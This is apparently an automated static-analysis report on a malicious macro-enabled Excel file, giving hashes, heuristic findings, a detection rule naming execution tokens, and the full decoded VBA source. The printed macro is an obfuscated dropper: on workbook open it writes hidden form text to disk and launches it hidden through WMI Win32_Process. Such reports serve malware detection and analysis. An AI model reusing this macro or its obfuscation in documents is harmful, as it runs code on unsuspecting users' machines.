Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 771325041cb1326e…

MALICIOUS

Office (OOXML) / .XLSX

Size: 179.9 KB
Created: 2021-03-22 13:11:29 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2022-07-13
MD5: b9a157c0fd8a38c5b065892987447385
SHA-1: b4ef1891db1bd3d2d48603fea3c9dda252b75815
SHA-256: 771325041cb1326e59838f219a4f4b0493d788b9e32d5404cb0f6e1c99c1408c
Risk Score: 110

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Office document containing VBA macros, indicated by the OOXML_VBA and OLE_VBA_WBOPEN heuristics. The Workbook_Open macro is present and uses GetObject, suggesting an attempt to execute code. The obfuscated VBA script likely aims to download and execute a second-stage payload, as suggested by the presence of 'wmic' and 'winmgmts' commands within the document body, which could be used for process execution or information gathering. The VBA code itself is heavily obfuscated, making a precise determination of its actions difficult, but the overall pattern points to a macro-based downloader.

Heuristics 5

  • VBA project inside OOXML (severity: medium; 3 related findings; rule: OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • GetObject call (severity: high; rule: OLE_VBA_GETOBJ)
    GetObject call
    Matched line in script:
    Set NVWNO_yHmgV_pzpAjrdH = GetObject(FpjJLsQxf_dLILsYhexySzHU.smvaPo_LuHKu).SpawnInstance_
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro (severity: low; rule: OLE_VBA_WBOPEN)
    Workbook_Open macro
    Matched line in script:
    Private Sub Workbook_Open()
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8528 bytes
SHA-256: e870803c423b1dc52bedb7606d493995be398f2d2dca52c4777f9bf4e395670b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
124 of 235 identifiers look randomly generated (e.g. 'mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
DJKIsfM = IsEmpty("pnUrq5V_FnLN3")
IsError (IsObject(sXjVpSv6qX7wX))
lMkHXSTQnOiCg = IsNumeric("DvQ1GTU")
eljv_dniL_UQC.CVaBrkzWTGgYKziQdmUOi
IsNumeric ("NEFxij_KMkINX")
IsMissing (IsObject(MfkqalCIspE))
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG"
Function oGaIrqcmOGNffeylHHAnjz()


HdvnXO = IsDate(IsArray(SDXM4HM))


DAmkNFPZL5B6 = IsArray(IsObject("xhpjXMMLa66"))


IsObject (IsDate(TwCUAI3ZINml))


oGaIrqcmOGNffeylHHAnjz = Range("GQ85")


IsDate ("b0DhM1")


IsEmpty (IsArray(L6qJNn))


DWU4zAWKTvG = IsError("n6OPz1_xbfNWm")


End Function


Function WRAdwjBDRtstP_NI()


IsError (xZTTMtV_TXkFrt)


WRAdwjBDRtstP_NI = Range("FO77")


LcBx46x = IsEmpty(D8PXYnD)


IsArray (IsNumeric(f8AP7ls08p8D))


End Function


Function qTmsJrjdhKOHCkGzt()


IsError (IsArray("DFhQr09_tHkRU"))


qTmsJrjdhKOHCkGzt = Range("EL255")


PROqcbF = IsMissing(IsNumeric(Us6zbft_CWkibO))


IsDate ("lwQnIp4E5Mh")


End Function

Attribute VB_Name = "FpjJLsQxf_dLILsYhexySzHU"
Function QZdKuofowyE_FuKFt()

IsNumeric (jcxU8L)

IsMissing ("DP0t14")

IsEmpty (IsObject(L2txbqeTh6EI))

IsNull (IsArray(FxxcNY0cbrotd))

IsObject ("U7y8rqL")

IsDate (IsEmpty(ALgW76r_4XRXCr))
Slaxri = IsObject(NH7P9Xh)
YQbQCEB_d_wSD = mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG.oGaIrqcmOGNffeylHHAnjz
IsMissing (IsError(Xend7HMhrasSa))
Sly7Dg = IsDate(IsNumeric(Vx0Syvf))
rT0uqa6KTZEp = IsDate(nC4FvW_W42s4e)
IsError (kmWu9hC)
C0UONe0z02mw = IsMissing(IsObject("kXvNNX1heJS"))
IsArray ("H0qXKl")
QZdKuofowyE_FuKFt = YQbQCEB_d_wSD

GEcTXj1NqK6z = IsError(IsDate(EIzIqky))

IsNull (IsError("RYEQ019"))

IsNull (IsError(J1DXJIHDlglL))

End Function

Function smvaPo_LuHKu()

IsDate ("CITFVW_q8dB81")

IsEmpty (IsObject("SzKLN9y_KY0XO"))

tepEYGZposcdkPmNbGI_g = mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG.WRAdwjBDRtstP_NI
RUAUJuYnORRoLoCxYnILFGhiyKVKrJk = Range("GV180")
IsNumeric (IsNumeric("A0I3A0"))
IsNull (IsArray(MWVyaHW))
SWyxWOb = IsEmpty("IOqDTd_oJysDg")
IsEmpty (IsMissing(jX3t3Oz4wjy8))
IsMissing (IsNumeric("LQLJUS"))
FDrAHaBVgaDP = IsDate(IsDate(oy9gO7))
IsNull (IsDate("Ns2kR3_25vU90"))
IsError (IsNumeric(RGT37xK))
AHPs_MdBJewdz = NS_hiFrTA_qC.NGsSLbhckovf
smvaPo_LuHKu = RUAUJuYnORRoLoCxYnILFGhiyKVKrJk + AHPs_MdBJewdz + tepEYGZposcdkPmNbGI_g

IsDate (IsNumeric("cU1sVP_EvA0xF"))

TVL3BDy9j2J3 = IsError(UlEOZXXEjHH)

JzOmRIj = IsArray(lLNFUkvmHz8a)

End Function

Function wiBBvpqRh__zSVzPCvaMOL_euRwlS()

ei5AhlU = IsNumeric(N9oJdP_1FeN0t)

EAtnWDm = IsEmpty(ZWyD3N38KGjH0)

WwpdzarMW = ChrW(CLng((122 Xor (-5.59610705596107E-02 * (-1126 + 715#))))) _
 
XcQIyperjgHnYUkLwUrIQB_omKLGX = ChrW(99)
IsNumeric (IsError("ijD17qi"))
pfesCV_ALepDbpRabividywT = Chr(109) _
 
NfDoMCxkrMCUZuNQe_j_nFG_o = Chr(CLng((991 + (7.34645669291339 * -127))))
HOVpVKcU = ChrW(CLng((-187 + (2.91489361702128 * xlDialogUnhide))))
pQoeZlBGfQihYYjv_PGvLhBb_gDDAr = Chr(58)
LBKBBsPyeo_l_RA = ChrW(114)
IsNumeric ("ADEl1Z_auODz")
UivZG_gJBEGJHdYwaOGgrLIgyIX = Chr(105)
hrwSpbWjfYpdejHJWF = Replace("md>96md>96md>96n32_Procemd>96md>96", "md>96", "")
pyDMzuU = Chr(CLng((-579 + ((611 + 146#) - 59#))))
YStLWm_pwNQCIcJkIa = Chr(CLng((Not (-451 + 400#))))
IsError ("B4rpwdX_HWZRQ")
qprMnOaImaaASKco_psyyh_DCZAdxW = Chr(115) _
 
Xc_rxFjUfFKzQVSutZpRDegQ = Chr(CLng(((-610 - -422#) - -304)))
lzeAZmrnqijre = ChrW(105)
wiBBvpqRh__zSVzPCvaMOL_euRwlS = Join(Array(pyDMzuU & Chr(CLng(((-457 + 467#) Xor xlConeColClustered))) & Chr(CLng(((-224 + 299#) Xor xlRangeAutoFormatTable6))) _
  & WwpdzarMW & Chr(CLng((xlHundredMillions + xlDialogDeleteFormat))) & pfesCV_ALepDbpRabividywT & Xc_rxFjUfFKzQVSutZpRDegQ & qprMnOaImaaASKco_psyyh_DCZAdxW & pQoeZlBGfQihYYjv_PGvLhBb_gDDAr & LBKBBsPyeo_l_RA & Chr(111) & ChrW(111) & ChrW(116) & Chr(92) & XcQIyperjgHnYUkLwUrIQB_omKLGX & lzeAZmrnqijre & Chr(109) & Chr(CLng((Not ((-1422 - -405#) + 898#)))) & YStLWm_pwNQCIcJkIa & NfDoMCxkrMCUZuNQe_j_nFG_o & HOVpVKcU & UivZG_gJBEGJHdYwaOGgrLIgyIX & hrwSpbWjfYpdejHJWF & NS_hiFrTA_qC.ucismXXbDEF))

ES9Jxw5 = IsArray("g2x9nPhSDALfu")

IsArray ("xDDaJhJ")

IsDate (AJkGC0uPuo53)

End Function

Function AAZJ_ixgCMsuxTjNw()

ImpFeh = IsObject("R497DO")

J1sk75plhteHI = IsArray(IsError("IXC6EBC0hN4p"))

IsObject ("PhAKdp")
kYByyrE = IsError(IsArray(WL6Lac))
r8oqpu = IsEmpty(RQ8Pjk)
biKccNhwalnlGxfNM = Range("HJ88")
B7eBCvh = IsNull(LhwBMhV_OrvZ2)
IsObject (IsEmpty(P7G4k0aCAeoV))
IsArray (IsNull(JKHgsau_G8TcN))
iYkw7w_sJEieg = IsError(IsEmpty("Lia4J6"))
StbN_CUMr_hw_GeA = Range("HZ247")
IsDate (IsDate("JcadeOl"))
AAZJ_ixgCMsuxTjNw = Join(Array(biKccNhwalnlGxfNM & StbN_CUMr_hw_GeA & mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG.qTmsJrjdhKOHCkGzt))

ZkAzC8a = IsArray(IsDate("ZM2NTH_BQyLOt"))

IsNumeric (IsDate(rNK4jhHkh5gtA))

gEfYJ9_6lL00 = IsNumeric(DpwsBGj_wODKg6)

End Function


Attribute VB_Name = "NS_hiFrTA_qC"
Attribute VB_Base = "0{AFF362B7-94F2-42CF-B067-534207BF8B96}{96D0F2CA-F860-4DEC-9DE8-BECD63BA89ED}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function NGsSLbhckovf()


IsDate ("F6pYby")


AnaOUw = IsDate("ajxl5gP")


IsArray (IsError("DDkXCRk"))


NGsSLbhckovf = Range("HL219")


IsObject ("ZWGC9GHh4uh")


IsMissing ("TgRh3c_P0HKI")


ukoKZL = IsNull("FlYibQ_XBoPV")


End Function


Function ucismXXbDEF()


IsEmpty (qfja4Qv)


ucismXXbDEF = Range("BK254")


NNSnK1 = IsNumeric(IsNumeric(iJfHnl))


U2BwNYTi9rjw = IsDate("CGMKpr")


End Function

Attribute VB_Name = "OhfmSJOBIU"
Function NVWNO_yHmgV_pzpAjrdH()

IsNumeric (IsNumeric(cdlovf))

IsNull (IsObject(uLwY8Y2))

IsEmpty (eeHuJ0FjGtwG)

Set NVWNO_yHmgV_pzpAjrdH = GetObject(FpjJLsQxf_dLILsYhexySzHU.smvaPo_LuHKu).SpawnInstance_

cYCcBtHuMMa3 = IsEmpty(IsDate("X1SNoOvu44ph"))

IsError (IsDate(ZPfhvq_XuKzFD))

IsObject (IsDate("ORPNAD_f6hXF"))

With NVWNO_yHmgV_pzpAjrdH

.ShowWindow = CLng((xlLeftBrace Or xlEPS))

End With

IsMissing (IsDate("GFeKMJ5"))

IsObject (IsEmpty("Mon3UcjmJ4R"))

Zkk2xJM8PhQ = IsNumeric(IsDate(Rk3VtoQ))

End Function

Attribute VB_Name = "eljv_dniL_UQC"
Function CVaBrkzWTGgYKziQdmUOi()


Dim C_elQEaM_fzlxQyq_OhFNIZo As String


WSKr6F = IsDate("YhIt08")


HNB4JHf = IsDate(IsArray(vF6O4Iu6sUb0u))


C_elQEaM_fzlxQyq_OhFNIZo = Replace(NS_hiFrTA_qC.sUff_NcuIfSGEerZBNFusVgwD.Text, "!s=/Cw^MNCNT", "")


IsArray (IsNumeric("SlO4ppVVpwXq"))


IsArray (IsDate("CkVJYze8wtdl6"))


KmTP5p_g1UknM = IsDate(IsDate("AIxKq9"))


Open Application.ActiveWorkbook.Path & FpjJLsQxf_dLILsYhexySzHU.QZdKuofowyE_FuKFt For Binary As #CLng((xlSortNormal Xor xlMicrosoftWord))


IsObject ("Zb7lMQK_p9Kul")


IsArray (Z0jRdK8_AK7KK)


Put #CLng((xlParamTypeChar And xlSourceSheet)), , C_elQEaM_fzlxQyq_OhFNIZo


WhN2o5395gTkz = IsArray(IsNumeric(HqmA5Z2pcyHz))


IsDate (CCLt9ujszujl)


Close #CLng((xlStandardSummary Or xlOLELink))


UwZeKb = IsDate(xQSNBhf_x4SgWt)


IsError ("XJdDIl3xanLoD")


hKRA_ZIYZJqlouGJs_zkg_SnH


K0XroISYwM0 = IsDate(IsObject(VEdA3NuczVd))


CWTLADq = IsArray(IsEmpty(Qb1PWJ))


End Function


Function hKRA_ZIYZJqlouGJs_zkg_SnH()


IsArray (Xjk7mWMeGLMp)


IH0bFN1 = IsArray("pfSZrz")


IsArray ("rFlYacu")


With GetObject(FpjJLsQxf_dLILsYhexySzHU.wiBBvpqRh__zSVzPCvaMOL_euRwlS)


.Create FpjJLsQxf_dLILsYhexySzHU.AAZJ_ixgCMsuxTjNw & Chr(34) & Application.ActiveWorkbook.Path & FpjJLsQxf_dLILsYhexySzHU.QZdKuofowyE_FuKFt & Chr(34), Null, OhfmSJOBIU.NVWNO_yHmgV_pzpAjrdH


End With


IsDate (IsError(NvDXHX_TgpXLG))


IsEmpty (IsDate(QgXXZXK))


PyMe5pq = IsArray(jmfQKpW)


NpFfX58_DjN57s = IsDate(IsDate(S3HIfQR))


End Function
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 58368 bytes
SHA-256: 268a89195c6bb9b45a88d4d673b514818686431e21d91e0e57b2ad65e482e1a3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
742 of 1102 identifiers look randomly generated (e.g. 'mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG') — consistent with name-mangling obfuscation.